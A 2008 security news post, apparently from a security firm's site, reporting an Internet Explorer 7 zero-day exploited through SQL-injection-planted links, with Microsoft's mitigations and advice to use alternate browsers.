Site Network: | | Jongsma & Jongsma

Innovation in Information Security

Coverage of important Information Security and Information Technology news and events from the research team at S?nnet Beskerming.

Username: | Password: Contact us to request an account

An Interesting Internet Explorer 0-day

News of what is the closest thing to a widespread 0-day attack against Internet Explorer for some time has been spreading across the Internet, complete with fully described exploits code, available from a number of sources, such as the dependable milw0rm.

Microsoft's own notice on the vulnerability identifies that the vulnerable platforms are Internet Explorer version 7 on Windows XP, 2003, Vista, and 2008. Microsoft have identified that setting the Internet zone security setting to High blocks the current implementations of the attack, and running Internet Explorer with Data Execution Prevention (DEP) will limit attack options.

The biggest problem with the High setting on the Internet zone security settings is that it effectively disables ActiveX and Active Scripting for all sites that haven't previously been identified as Trusted. For many users this particular step may lead to significant usability difficulties when visiting their regular Internet sites, and, as described below, the use of the attack in blended attacks means that even a trusted site can become affected by this particular vulnerability in a very short period of time.

Already several different versions are available, varying in how they go about filling the arrays before launching the attack (and exactly how the attack is launched). From the ISC writeup, it seems that many of the sites currently using this vulnerability to target Windows XP, Vista, and 2008 users, are using the version (or a derivative) that the ISC initially received. The milw0rm version is slightly different in makeup and is expected to become the dominant version once other malware distributors pick up this distribution method.

The ISC write up also highlights the appearance in blended attacks, making use of SQL injection as the delivery vector to implant an infected link on a site which then silently loads the Internet Explorer 0-day.

Until such time as detection has been included in the major antimalware detection engines, and Microsoft has been able to release an appropriate patch to address the issue, it is recommended that users consider the use of alternate browsers for their Internet use (the preferred solution), or to apply the non-patch mitigation steps recommended by Microsoft (and listed above).

11 December 2008

Social bookmark this page at eKstreme.
Alternatively, Bookmark or Share via AddThis

Do you like how we cover Information Security news? How about checking out our company services, delivered the same way our news is.

Let our Free OS X Screen Saver deliver the latest security alerts and commentary to your desktop when you're not at your system.

Comments will soon be available for registered users.